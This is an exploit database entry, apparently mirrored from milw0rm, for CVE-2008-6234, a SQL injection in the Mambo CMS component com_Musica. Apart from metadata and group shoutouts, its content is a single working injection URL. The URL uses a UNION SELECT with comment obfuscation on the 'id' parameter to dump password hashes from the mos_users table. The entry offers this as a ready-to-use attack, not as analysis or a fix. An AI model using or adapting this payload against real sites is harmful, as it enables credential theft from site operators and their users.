EXPLOITS

Mambo Component com_Musica - 'id' SQL Injection

Author: Aria-Security Team
type: webapps
platform: php
port: 
date_added: 2008-02-29  
date_updated: 2016-11-15  
verified: 1  
codes: OSVDB-52228;CVE-2008-6234  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5207.txt  

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff
Mambo com_Musica "id" Remote SQL Injection


index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*

Original Link:
http://forum.aria-security.net/showthread.php?t=588

Regards,
The-0utl4w

# milw0rm.com [2008-03-01]